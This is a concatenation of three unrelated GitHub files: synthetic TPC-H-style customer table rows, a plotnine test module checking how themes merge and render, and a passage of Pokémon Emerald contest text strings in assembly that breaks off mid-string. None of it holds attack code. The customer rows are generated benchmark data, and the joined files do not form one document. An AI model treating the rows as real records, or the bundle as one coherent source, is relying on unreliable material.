217|Customer#000000217|YIy05RMdthrXqdfnNKud|23|33-159-298-3849|378.33|AUTOMOBILE|ven frays wake according to the carefully 218|Customer#000000218| V1FCIeSseuyNGYfHS Rx0,sc4IsBfReV|4|14-480-931-8567|9541.19|MACHINERY|lar courts. furiously pending dependencies cajole blithely? fluffily regular deposits cajol 219|Customer#000000219|eTjiL01eyoKiAe2WQoz3EpPg2lvSLeOu2X2wyxK|11|21-159-138-6090|9858.57|AUTOMOBILE|ckly multipliers. carefully eve 220|Customer#000000220|TbUHVhkttz|16|26-201-301-7371|9131.64|BUILDING| even, even accounts are. 
ironic 221|Customer#000000221|ripNyyPOewg8AahnZlsM|16|26-351-738-1001|1609.39|BUILDING| instructions above the regular requests cajole packages. pending, even 222|Customer#000000222|gAPkFjwxX1Zq 2Yq6 FIfLdJ4yUOt4Al7DL18Ou|1|11-722-672-5418|8893.76|BUILDING|regular accounts haggle furiously around the c 223|Customer#000000223|ftau6Pk,brboMyEl,,kFm|20|30-193-643-1517|7476.20|BUILDING|al, regular requests run furiously blithely silent packages. blithely ironic accounts across the furious 224|Customer#000000224|4tCJvf30WagGfacqcAqmfCptu2cbMVcj2M7Y0W|15|25-224-867-3668|8465.15|BUILDING|counts. bold packages doubt according to the furiously pending packages. bold, regular pinto beans 225|Customer#000000225|2HFk1E0fmqs|13|23-979-183-7021|8893.20|AUTOMOBILE|ages boost among the special foxes. quiet, final foxes lose carefully about the furiously unusual th 226|Customer#000000226|ToEmqB90fM TkLqyEgX8MJ8T8NkK|3|13-452-318-7709|9008.61|AUTOMOBILE|ic packages. ideas cajole furiously slyly special theodolites: carefully express pinto beans acco 227|Customer#000000227|7wlpEBswtXBPNODASgCUt8OZQ|13|23-951-816-2439|1808.23|MACHINERY|lar, ironic pinto beans use! quickly regular theodolites maintain slyly pending pac 228|Customer#000000228|A1Zvuxjdpt8TZP6i41H3fn9csGqOJUm5x0NIS1LA|20|30-435-915-1603|6868.12|FURNITURE| blithely ironic theodolites 229|Customer#000000229|Sbvjxgmwy4u6Ks1FH7lxo7toMmeU5dG|1|11-243-298-4029|7568.07|BUILDING|bold accounts haggle furiously even deposits. regular instruct 230|Customer#000000230|CnR8xt3MYqID0tiHwYh|21|31-744-950-8047|1682.83|MACHINERY|c decoys impress even deposits. thinly final asymptotes 231|Customer#000000231|WFOhG9Z9ohRdsyuYnPvBSv|10|20-825-880-1065|283.55|BUILDING|ly final deposits. fluffily ironic requests wake carefully carefully regular accounts. quickly sp 232|Customer#000000232|oA9o,3YOXu2rzKONdd,cxpqCFXUv5kuxBYKp|22|32-283-563-2674|554.71|HOUSEHOLD|ges sleep. final, bold theodolites are quickly final packages. 
furiously ironic packages are slyly fi 233|Customer#000000233|mFm45wZ7rV4VIbEE1F4|3|13-574-104-3221|3998.24|FURNITURE|st the special instructions. theodolites detect blithely according 234|Customer#000000234|ILyuJbixVmrNEVxsfQOMFxByySs|18|28-243-424-1393|8383.51|AUTOMOBILE| fluffily regular ideas play s 235|Customer#000000235|bp0rIBMh4fMdQnHBmMnB|3|13-350-790-6416|754.41|AUTOMOBILE|hely ruthless instructions again 236|Customer#000000236|kcW,mM0rhIstAcVaol1,6DVkS FPKlhY|14|24-808-967-4503|5384.59|AUTOMOBILE|te slyly along the requests. carefully final requests sleep slyly blithe frets. furiously ruthless dep 237|Customer#000000237|R dtznB5ocPPo|19|29-414-970-5238|-160.02|HOUSEHOLD|regular pinto beans sleep furiously ironically silent theodolites. quickly ironic courts after the deposits sleep f 238|Customer#000000238|tE0lVKK3tz5AG2 Hal2XHwE485g5MX7|16|26-307-925-1236|3482.32|HOUSEHOLD|uffily ironic theodolites are. regular, regular ideas cajole according to the blithely pending epitaphs. slyly 239|Customer#000000239|w8eRmMOmUTjVOkucbfcGDh2AqCixTOC|9|19-699-117-6988|5398.77|FURNITURE|uctions. furiously even dolphins haggle fluffily according to the furiously regular dep 240|Customer#000000240|SXfeEOwRZsXArtY3C5UWqXgLcJBAMmaynaTJs8|9|19-756-548-7835|7139.68|MACHINERY|al accounts about the slyly pending p 241|Customer#000000241|FBuwHkPR450PvnZnAezcaeMaS,hX3Ifdk|9|19-344-614-2207|6569.34|AUTOMOBILE| across the enticingly even requests. blithely iro 242|Customer#000000242|apgzK3HWAjKHFteJ16Tg3OERViesqBbx|3|13-324-350-3564|1975.41|MACHINERY|riously ironic pinto beans cajole silently. regular foxes wake slyly. bravely 243|Customer#000000243|te2FOn8xJzJinZc|7|17-297-684-7972|620.73|AUTOMOBILE|nic deposits. evenly pending deposits boost fluffily careful 244|Customer#000000244|FBVbCpEVaFaP8KogqQO2VuXeVx|15|25-621-225-8173|2506.38|HOUSEHOLD|encies. requests nag carefully. 
regularly final accounts h 245|Customer#000000245|IseFIO7jTGPTzAdZPoO2X4VX48Hy|12|22-952-232-2729|3720.15|MACHINERY|s. regular foxes against the s 246|Customer#000000246|WrRUR0ds6iypmopww9y9t0NJBRbke78qJm|15|25-608-618-2590|9584.96|AUTOMOBILE| requests shall have to integrate furiously pending courts. sil 247|Customer#000000247|N8q4W4QQG2mHY47Dg6|20|30-151-905-3513|8495.92|HOUSEHOLD|es affix furiously regular deposits. blithely ironic asymptotes after the blithely e 248|Customer#000000248|mgT15r8asLyaED|10|20-447-727-8914|8908.35|FURNITURE|s detect blithely. blithely pending dolphins along the fluffily final accounts haggle fu 249|Customer#000000249|0XE2fhX7j2uivaHBrFuRl1NoJnaTSIQT|3|13-226-455-7727|-234.01|MACHINERY|its are after the special deposits. ironic, final deposits against the slyl 250|Customer#000000250|9hif3yif6z8w8pW88F755PU7uz|16|26-464-852-1461|2869.97|FURNITURE|s. slyly unusual instructions cajole quickly carefully bold dep
{ "pile_set_name": "Github" }
"""Tests for plotnine theme composition (``theme + theme``) semantics.

The ``test_add_*`` functions pin down how complete themes, partial
themes and individual theme elements merge, including the themeable
hierarchy (line -> axis_line -> axis_line_x) and element_blank
handling.  The ``TestThemes`` class smoke-tests every built-in theme;
the ``assert plot == 'name'`` comparisons are image comparisons
performed by plotnine's test harness (an ``__eq__`` hook registered
in conftest — not visible in this file).
"""
import os

from plotnine import ggplot, aes, geom_point, labs, facet_grid
from plotnine import (theme, theme_538, theme_bw, theme_classic,
                      theme_dark, theme_gray, theme_light,
                      theme_linedraw, theme_matplotlib,
                      theme_minimal, theme_seaborn, theme_void,
                      theme_xkcd)
from plotnine import element_line, element_text, element_blank
from plotnine.data import mtcars

# Shared adjustment applied to each plot before image comparison;
# leaves room on the right-hand side for the legend.
_theme = theme(subplots_adjust={'right': 0.80})


def test_add_complete_complete():
    # Adding two complete themes: the right-hand one wins outright.
    theme1 = theme_gray()
    theme2 = theme_matplotlib()
    theme3 = theme1 + theme2
    assert theme3 == theme2


def test_add_complete_partial():
    # Adding a partial theme onto a complete one changes only the
    # themeables named by the partial theme.
    theme1 = theme_gray()
    theme2 = theme1 + theme(axis_line_x=element_line())
    assert theme2 != theme1
    assert theme2.themeables != theme1.themeables
    assert theme2.rcParams == theme1.rcParams

    # specific difference
    for name in theme2.themeables:
        if name == 'axis_line_x':
            assert theme2.themeables[name] != theme1.themeables[name]
        else:
            assert theme2.themeables[name] == theme1.themeables[name]


def test_add_partial_complete():
    # Adding a complete theme onto a partial one discards the partial.
    theme1 = theme(axis_line_x=element_line())
    theme2 = theme_gray()
    theme3 = theme1 + theme2
    assert theme3 == theme2


def test_add_empty_theme_element():
    # An empty theme element does not alter the theme
    theme1 = theme_gray() + theme(axis_line_x=element_line(color='red'))
    theme2 = theme1 + theme(axis_line_x=element_line())
    assert theme1 == theme2


# Fixture elements shared by the hierarchy/blank tests below.
# l3 is l2 with the one property l2 omits (linetype) filled in from l1's
# value, which lets the tests express "l2 merged over l1" as an equality.
l1 = element_line(color='red', size=1, linewidth=1, linetype='solid')
l2 = element_line(color='blue', size=2, linewidth=2)
l3 = element_line(color='blue', size=2, linewidth=2, linetype='solid')
blank = element_blank()


def test_add_element_heirarchy():
    # NOTE(review): "heirarchy" is a typo for "hierarchy"; kept because
    # renaming would change which test id pytest collects.

    # parent themeable modifies child themeable
    theme1 = theme_gray() + theme(axis_line_x=l1)  # child
    theme2 = theme1 + theme(axis_line=l2)          # parent
    theme3 = theme1 + theme(axis_line_x=l3)        # child, for comparison
    assert theme2.themeables['axis_line_x'] == \
        theme3.themeables['axis_line_x']

    theme1 = theme_gray() + theme(axis_line_x=l1)  # child
    theme2 = theme1 + theme(line=l2)               # grand-parent
    theme3 = theme1 + theme(axis_line_x=l3)        # child, for comparison
    assert theme2.themeables['axis_line_x'] == \
        theme3.themeables['axis_line_x']

    # child themeable does not affect parent
    theme1 = theme_gray() + theme(axis_line=l1)    # parent
    theme2 = theme1 + theme(axis_line_x=l2)        # child
    theme3 = theme1 + theme(axis_line=l3)          # parent, for comparison
    assert theme3.themeables['axis_line'] != \
        theme2.themeables['axis_line']


def test_add_element_blank():
    # Adding onto a blanked themeable
    theme1 = theme_gray() + theme(axis_line_x=l1)   # not blank
    theme2 = theme1 + theme(axis_line_x=blank)      # blank
    theme3 = theme2 + theme(axis_line_x=l3)         # not blank
    theme4 = theme_gray() + theme(axis_line_x=l3)   # for comparison
    assert theme3 != theme1
    assert theme3 != theme2
    assert theme3 == theme4  # blanking cleans the slate

    # When a themeable is blanked, the apply method
    # is replaced with the blank method.
    th2 = theme2.themeables['axis_line_x']
    th3 = theme3.themeables['axis_line_x']
    assert th2.apply.__name__ == 'blank'
    assert th3.apply.__name__ == 'apply'


class TestThemes:
    """One rendering smoke test per built-in theme.

    Each test builds the shared faceted scatter plot ``g`` with the
    theme under test and compares the rendered image against a stored
    baseline named after the theme.
    """

    # Reference plot reused by every theme test.
    g = (ggplot(mtcars, aes(x='wt', y='mpg', color='factor(gear)'))
         + geom_point()
         + facet_grid('vs ~ am'))

    def test_theme_538(self):
        p = self.g + labs(title='Theme 538') + theme_538()
        assert p + _theme == 'theme_538'

    def test_theme_bw(self):
        p = self.g + labs(title='Theme BW') + theme_bw()
        assert p + _theme == 'theme_bw'

    def test_theme_classic(self):
        p = self.g + labs(title='Theme Classic') + theme_classic()
        assert p + _theme == 'theme_classic'

    def test_theme_dark(self):
        p = self.g + labs(title='Theme Dark') + theme_dark()
        assert p + _theme == 'theme_dark'

    def test_theme_gray(self):
        p = self.g + labs(title='Theme Gray') + theme_gray()
        assert p + _theme == 'theme_gray'

    def test_theme_light(self):
        p = self.g + labs(title='Theme Light') + theme_light()
        assert p + _theme == 'theme_light'

    def test_theme_linedraw(self):
        p = self.g + labs(title='Theme Linedraw') + theme_linedraw()
        assert p + _theme == 'theme_linedraw'

    def test_theme_matplotlib(self):
        p = self.g + labs(title='Theme Matplotlib') + theme_matplotlib()
        assert p + _theme == 'theme_matplotlib'

    def test_theme_minimal(self):
        p = self.g + labs(title='Theme Minimal') + theme_minimal()
        assert p + _theme == 'theme_minimal'

    def test_theme_seaborn(self):
        p = self.g + labs(title='Theme Seaborn') + theme_seaborn()
        assert p + _theme == 'theme_seaborn'

    def test_theme_void(self):
        p = self.g + labs(title='Theme Void') + theme_void()
        assert p + _theme == 'theme_void'

    def test_theme_xkcd(self):
        p = (self.g
             + labs(title='Theme Xkcd')
             + theme_xkcd()
             # High likelihood of Comic Sans being available
             + theme(text=element_text(family=['Comic Sans MS']))
             )

        if os.environ.get('TRAVIS'):
            # Travis does not have the fonts, we still check
            # to catch any other errors
            assert p + _theme != 'theme_gray'
        else:
            assert p + _theme == 'theme_xkcd'
{ "pile_set_name": "Github" }
@ Contest move effect descriptions gText_HighlyAppealingMove:: @ 827CB82 .string "A highly appealing move.$" gText_UserMoreEasilyStartled:: @ 827CB9B .string "After this move, the user is\nmore easily startled.$" gText_GreatAppealButNoMoreToEnd:: @ 827CBCE .string "Makes a great appeal, but\nallows no more to the end.$" gText_UsedRepeatedlyWithoutBoringJudge:: @ 827CC03 .string "Can be repeatedly used\nwithout boring the JUDGE.$" gText_AvoidStartledByOthersOnce:: @ 827CC34 .string "Can avoid being startled\nby others once.$" gText_AvoidStartledByOthers:: @ 827CC5D .string "Can avoid being startled\nby others.$" gText_AvoidStartledByOthersLittle:: @ 827CC81 .string "Can avoid being startled\nby others a little.$" gText_UserLessLikelyStartled:: @ 827CCAE .string "After this move, the user is\nless likely to be startled.$" gText_SlightlyStartleFrontMon:: @ 827CCE7 .string "Slightly startles the\nPOKéMON in front.$" gText_SlightlyStartleAppealed:: @ 827CD0F .string "Slightly startles those\nthat have made appeals.$" gText_StartleAppealedBeforeUser:: @ 827CD3F .string "Startles the POKéMON that\nappealed before the user.$" gText_StartleAllAppealed:: @ 827CD73 .string "Startles all POKéMON that\nhave done their appeals.$" gText_BadlyStartleFrontMon:: @ 827CDA6 .string "Badly startles the\nPOKéMON in front.$" gText_BadlyStartleAppealed:: @ 827CDCB .string "Badly startles those that\nhave made appeals.$" gText_StartleAppealedBeforeUser2:: @ 827CDF8 .string "Startles the POKéMON that\nappealed before the user.$" gText_StartleAllAppealed2:: @ 827CE2C .string "Startles all POKéMON that\nhave done their appeals.$" gText_ShiftJudgesAttentionFromOthers:: @ 827CE5F .string "Shifts the JUDGE's\nattention from others.$" gText_StartleMonHasJudgesAttention:: @ 827CE89 .string "Startles the POKéMON that\nhas the JUDGE's attention.$" gText_JamOthersMissesTurn:: @ 827CEBE .string "Jams the others, and misses\none turn of appeals.$" gText_StartleMonsMadeSameTypeAppeal:: @ 827CEEF .string 
"Startles POKéMON that\nmade a same-type appeal.$" gText_BadlyStartleCoolAppeals:: @ 827CF1E .string "Badly startles POKéMON\nthat made COOL appeals.$" gText_BadlyStartleBeautyAppeals:: @ 827CF4D .string "Badly startles POKéMON\nthat made BEAUTY appeals.$" gText_BadlyStartleCuteAppeals:: @ 827CF7E .string "Badly startles POKéMON\nthat made CUTE appeals.$" gText_BadlyStartleSmartAppeals:: @ 827CFAD .string "Badly startles POKéMON\nthat made SMART appeals.$" gText_BadlyStartleToughAppeals:: @ 827CFDD .string "Badly startles POKéMON\nthat made TOUGH appeals.$" gText_MakeMonAfterUserNervous:: @ 827D00D .string "Makes one POKéMON after\nthe user nervous.$" gText_MakeAllMonsAfterUserNervous:: @ 827D037 .string "Makes all POKéMON after\nthe user nervous.$" gText_WorsenConditionOfThoseMadeAppeals:: @ 827D061 .string "Worsens the condition of\nthose that made appeals.$" gText_BadlyStartleMonsGoodCondition:: @ 827D093 .string "Badly startles POKéMON in\ngood condition.$" gText_AppealGreatIfPerformedFirst:: @ 827D0BD .string "The appeal works great if\nperformed first.$" gText_AppealGreatIfPerformedLast:: @ 827D0E8 .string "The appeal works great if\nperformed last.$" gText_AppealAsGoodAsThoseBeforeIt:: @ 827D112 .string "Makes the appeal as good\nas those before it.$" gText_AppealAsGoodAsOneBeforeIt:: @ 827D13F .string "Makes the appeal as good\nas the one before it.$" gText_AppealBetterLaterItsPerformed:: @ 827D16E .string "The appeal works better\nthe later it is performed.$" gText_AppealVariesDependingOnTiming:: @ 827D1A1 .string "The appeal's quality varies\ndepending on its timing.$" gText_WorksWellIfSameTypeAsBefore:: @ 827D1D6 .string "Works well if it's the same\ntype as the one before.$" gText_WorksWellIfDifferentTypeAsBefore:: @ 827D20A .string "Works well if different in\ntype than the one before.$" gText_AffectedByAppealInFront:: @ 827D23F .string "Affected by how well the\nappeal in front goes.$" gText_UpsConditionHelpsPreventNervousness:: @ 827D26E .string "Ups 
the user's condition.\nHelps prevent nervousness.$" gText_AppealWorksWellIfConditionGood:: @ 827D2A3 .string "The appeal works well if the\nuser's condition is good.$" gText_NextAppealMadeEarlier:: @ 827D2DA .string "The next appeal can be\nmade earlier next turn.$" gText_NextAppealMadeLater:: @ 827D309 .string "The next appeal can be\nmade later next turn.$" gText_TurnOrderMoreEasilyScrambled:: @ 827D336 .string "Makes the next turn's order\nmore easily scrambled.$" gText_ScrambleOrderOfNextAppeals:: @ 827D369 .string "Scrambles the order of\nappeals on the next turn.$" gText_AppealExcitesAudienceInAnyContest:: @ 827D39A .string "An appeal that excites the\naudience in any CONTEST.$" gText_BadlyStartlesMonsGoodAppeals:: @ 827D3CE .string "Badly startles all POKéMON\nthat made good appeals.$" gText_AppealBestMoreCrowdExcited:: @ 827D401 .string "The appeal works best the\nmore the crowd is excited.$" gText_TemporarilyStopCrowdExcited:: @ 827D436 .string "Temporarily stops the\ncrowd from growing excited.$" @ Unused move names gText_RainDance:: @ 827D468 .string "RAIN DANCE$" gText_Rage:: @ 827D473 .string "RAGE$" gText_FocusEnergy:: @ 827D478 .string "FOCUS ENERGY$" gText_Hypnosis:: @ 827D485 .string "HYPNOSIS$" gText_Softboiled:: @ 827D48E .string "SOFTBOILED$" gText_HornAttack:: @ 827D499 .string "HORN ATTACK$" gText_SwordsDance:: @ 827D4A5 .string "SWORDS DANCE$" gText_Conversion:: @ 827D4B2 .string "CONVERSION$" gText_SunnyDay:: @ 827D4BD .string "SUNNY DAY$" gText_Rest2:: @ 827D4C7 .string "REST$" gText_Vicegrip:: @ 827D4CC .string "VICEGRIP$" gText_DefenseCurl:: @ 827D4D5 .string "DEFENSE CURL$" gText_LockOn:: @ 827D4E2 .string "LOCK-ON$" @ Contest type names gContestMoveTypeCoolText:: @ 827D4EA .string "COOL$" gContestMoveTypeBeautyText:: @ 827D4EF .string "BEAUTY$" gContestMoveTypeCuteText:: @ 827D4F6 .string "CUTE$" gContestMoveTypeSmartText:: @ 827D4FB .string "SMART$" gContestMoveTypeToughText:: @ 827D501 .string "TOUGH$" 
gText_AppealNumWhichMoveWillBePlayed:: @ 827D507 .string "Appeal no. {STR_VAR_1}!\n" .string "Which move will be played?$" gText_AppealNumButItCantParticipate:: @ 827D531 .string "Appeal no. {STR_VAR_1}!\n" .string "But it can't participate!$" gText_MonAppealedWithMove:: @ 827D55A .string "{STR_VAR_1} appealed with\n" .string "{STR_VAR_2}!$" gText_MonWasWatchingOthers:: @ 827D56F .string "{STR_VAR_1} was watching\n" .string "the others.{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" gText_AllOutOfAppealTime:: @ 827D597 .string "We're all out of\n" .string "Appeal Time!{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}{PAUSE 0x0F}$" @ Unused appeal result texts gText_ButAppealWasJammed:: @ 827D5C1 .string "But the appeal was\n" .string "jammed.$" gText_FollowedAnotherMonsLead:: @ 827D5DC .string "It followed another\n" .string "POKéMON's lead.$" gText_ButItMessedUp:: @ 827D600 .string "But it messed up.$" gText_WentBetterThanUsual:: @ 827D612 .string "It went better than\n" .string "usual.$" gText_JudgeLookedAwayForSomeReason:: @ 827D62D .string "The JUDGE looked away\n" .string "for some reason.$" gText_WorkedHardToBuildOnPastMistakes:: @ 827D654 .string "It worked hard to build on\n" .string "past mistakes.$" gText_CantMakeAnyMoreMoves:: @ 827D67E .string "It can't make any more\n" .string "moves.$" gText_WorkedFrighteninglyWell:: @ 827D69C .string "It worked frighteningly\n" .string "well.$" gText_WorkedHardAsStandoutMon:: @ 827D6BA .string "It worked as hard as the\n" .string "standout POKéMON.$" gText_JudgedLookedOnExpectantly:: @ 827D6E5 .string "The JUDGE looked on\n" .string "expectantly.$" gText_WorkedRatherWell:: @ 827D706 .string "It worked rather well.$" gText_WorkedLittleBetterThanUsual:: @ 827D71D .string "It worked a little better\n" .string "than usual.$" @ Round result texts gText_MonFailedToStandOutAtAll:: @ 827D743 .string "{STR_VAR_1} failed to\n" .string "stand out at all…{PAUSE_UNTIL_PRESS}$" gText_MonDidntStandOutVeryMuch:: @ 827D764 .string "{STR_VAR_1} 
didn't stand\n" .string "out very much…{PAUSE_UNTIL_PRESS}$" gText_MonCaughtALittleAttention:: @ 827D785 .string "{STR_VAR_1} caught a\n" .string "little attention.{PAUSE_UNTIL_PRESS}$" gText_MonAttractedALotOfAttention:: @ 827D7A5 .string "{STR_VAR_1} attracted a\n" .string "lot of attention.{PAUSE_UNTIL_PRESS}$" gText_MonCommandedTotalAttention:: @ 827D7C8 .string "{STR_VAR_1} commanded\n" .string "total attention.{PAUSE_UNTIL_PRESS}$" gText_MonHasntMadeItsAppeal:: @ 827D7E8 .string "{STR_VAR_1} hasn't made\n" .string "its appeal.{PAUSE_UNTIL_PRESS}$" @ Unused gText_AnticipationSwelledForMonsAppealNext2:: @ 827D805 .string "Anticipation swelled for\n" .string "{STR_VAR_1}'s appeal next.$" gText_EmptyContestString:: @ 827D830 .string "$" gText_JudgesViewsOnMonHeldFirm:: @ 827D831 .string "The JUDGE 's views on\n" .string "{STR_VAR_1} held firm.$" gText_MonsXChangedPerceptions:: @ 827D855 .string "{STR_VAR_1}'s {STR_VAR_3}\n" .string "changed perceptions.$" gText_MonsAppealEffectWoreOff:: @ 827D872 .string "{STR_VAR_1}'s appeal\n" .string "effect wore off.$" gText_SpecialAppealsEffectWoreOff:: @ 827D88F .string "The special appeal's\n" .string "effect wore off.$" gText_EveryonesAppealsMadeToLookSame:: @ 827D8B5 .string "Everyone's appeals were\n" .string "made to look the same.$" gText_CheapenedMonsAppeal:: @ 827D8E4 .string "It cheapened\n" .string "{STR_VAR_2}'s appeal.$" gText_CheapenedAppealOfThoseAhead:: @ 827D8FE .string "It cheapened the appeal\n" .string "of those ahead.$" gText_StoleAttentionAwayFromMon:: @ 827D926 .string "It stole attention away\n" .string "from {STR_VAR_2}.$" gText_CheapenedMonsAppeal2:: @ 827D947 .string "It cheapened\n" .string "{STR_VAR_2}'s appeal.$" gText_SeverelyCheapenedOtherAppeals:: @ 827D961 .string "It severely cheapened\n" .string "other appeals.$" gText_AnticipationSwelledForMonsAppealNext:: @ 827D986 .string "Anticipation swelled for\n" .string "{STR_VAR_1}'s appeal next.$" gText_CheapenedAppealOfThoseAhead2:: @ 827D9B1 
.string "It cheapened the appeal\n" .string "of those ahead.$" gText_CheapenedJudgesFavoriteAppeal:: @ 827D9D9 .string "It cheapened the JUDGE's\n" .string "favorite appeal.$" gText_AppealsOfOthersCheapenedByHalf:: @ 827DA03 .string "The appeals of others\n" .string "were cheapened by half.$" gText_StoodOutToMakeUpForBeingJammed:: @ 827DA31 .string "It stood out to make up\n" .string "for being jammed.$" gText_CantParticipateInAppealsAnyMore:: @ 827DA5B .string "It can't participate in\n" .string "appeals any more.$" gText_TouchedJudgeForFantasticAppeal:: @ 827DA85 .string "It touched the JUDGE for\n" .string "a fantastic appeal.$" gText_AnticipationRoseForUpcomingAppeals:: @ 827DAB2 .string "Anticipation rose for\n" .string "upcoming appeals.$" gText_StoodOutAsMuchAsSpecialAppeals:: @ 827DADA .string "It stood out as much as\n" .string "special appeals.$" gText_StoodOutAsMuchAsMon:: @ 827DB03 .string "It stood out as much as\n" .string "{STR_VAR_1}.$" gText_JammedAppealsMadeEvenLessNoticeable:: @ 827DB1F .string "Jammed appeals were made\n" .string "even less noticeable.$" gText_EveryonesAppealsMadeSame:: @ 827DB4E .string "Everyone's appeals were\n" .string "made the same.$" @ Appeal result texts gText_BecameMoreConsciousOfOtherMons:: @ 827DB75 .string "It became more conscious\n" .string "of the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonCantMakeAnAppealAfterThis:: @ 827DBB0 .string "{STR_VAR_1} can't make an\n" .string "appeal after this.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_SettledDownJustLittleBit:: @ 827DBE0 .string "It settled down just a\n" .string "little bit.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_BecameObliviousToOtherMons:: @ 827DC0F .string "It became oblivious to\n" .string "the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_BecameLessAwareOfOtherMons:: @ 827DC45 .string "It became less aware of\n" .string "the other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" 
gText_StoppedCaringAboutOtherMons:: @ 827DC7C .string "It stopped caring about\n" .string "other POKéMON much.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToStartleOtherMons:: @ 827DCB4 .string "It tried to startle the\n" .string "other POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToDazzleOthers:: @ 827DCE7 .string "It tried to dazzle the\n" .string "others.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_JudgeLookedAwayFromMon:: @ 827DD12 .string "The JUDGE looked away\n" .string "from {STR_VAR_1}.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToUnnerveNextMon:: @ 827DD3D .string "It tried to unnerve the\n" .string "next POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonBecameNervous:: @ 827DD6F .string "{STR_VAR_1} became\n" .string "nervous.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_AppealTriedToUnnerveWaitingMons:: @ 827DD8E .string "The appeal tried to\n" .string "unnerve waiting POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TauntedMonsDoingWell:: @ 827DDC7 .string "It taunted POKéMON\n" .string "doing well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonRegainedItsForm:: @ 827DDF2 .string "{STR_VAR_1} regained its\n" .string "form.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_TriedToJamMonDoingWell:: @ 827DE14 .string "It tried to jam POKéMON\n" .string "doing well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_StandoutMonHustledEvenMore:: @ 827DE44 .string "The standout {STR_VAR_1}\n" .string "hustled even more.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_LargelyUnnoticedMonWorkedHard:: @ 827DE73 .string "The largely unnoticed\n" .string "{STR_VAR_1} worked hard.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_WorkedAsMuchAsMonBefore:: @ 827DEA5 .string "It worked as much as\n" .string "POKéMON before it.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell:: @ 827DED9 .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" 
gText_WorkedAsMuchAsPrecedingMon:: @ 827DF02 .string "It worked as much as the\n" .string "preceding POKéMON.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell2:: @ 827DF3A .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotGoWell3:: @ 827DF63 .string "{STR_VAR_1}'s appeal did\n" .string "not go well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentSlightlyWell:: @ 827DF8C .string "{STR_VAR_1}'s appeal\n" .string "went slightly well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentPrettyWell:: @ 827DFB8 .string "{STR_VAR_1}'s appeal\n" .string "went pretty well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentExcellently:: @ 827DFE2 .string "{STR_VAR_1}'s appeal\n" .string "went excellently.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWasDud:: @ 827E00C .string "{STR_VAR_1}'s appeal was\n" .string "a dud.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealDidNotWorkVeryWell:: @ 827E02F .string "{STR_VAR_1}'s appeal did\n" .string "not work very well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentSlightlyWell2:: @ 827E05F .string "{STR_VAR_1}'s appeal\n" .string "went slightly well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentPrettyWell2:: @ 827E08B .string "{STR_VAR_1}'s appeal\n" .string "went pretty well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentVeryWell:: @ 827E0B5 .string "{STR_VAR_1}'s appeal\n" .string "went very well.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_MonsAppealWentExcellently2:: @ 827E0DD .string "{STR_VAR_1}'s appeal\n" .string "went excellently.{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_SameTypeAsOneBeforeGood:: @ 827E107 .string "It's the same type as the\n" .string "POKéMON before--good!{PAUSE 15}{PAUSE 15}{PAUSE 15}{PAUSE 15}$" gText_NotSameTypeAsOneBeforeGood:: @ 827E143 .string "It's not the same type as\n" .string "the one 
